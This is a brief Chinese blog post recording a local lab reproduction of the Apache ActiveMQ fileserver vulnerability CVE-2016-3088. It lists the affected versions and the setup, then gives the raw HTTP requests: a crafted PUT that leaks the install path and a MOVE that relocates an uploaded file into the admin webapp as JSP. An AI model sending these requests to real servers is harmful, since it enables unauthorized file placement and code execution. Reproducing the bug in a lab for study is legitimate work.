ActiveMQ漏洞( CVE-2016-3088)

本地用kali搭建复现一下

受影响的版本:Apache Group ActiveMQ 5.0.0 - 5.13.2

下载地址:http://archive.apache.org/dist/activemq/5.10.1/apache-activemq-5.10.1-bin.tar.gz

解压:tar -xzf apache-activemq-5.10.1-bin.tar.gz

启动:/home/apache-activemq-5.10.1/bin/linux-x86-32# ./activemq start

            Starting ActiveMQ Broker...


爆绝对路径

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1

路径:/home/apache-activemq-5.10.1/webapps/fileserver/


fileserver目录下jsp是不被执行了,而且是不能直接上传jsp文件


MOVE /fileserver/test.txt HTTP/1.1

Destination:file:/home/apache-activemq-5.10.1/webapps/admin/test.jsp


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容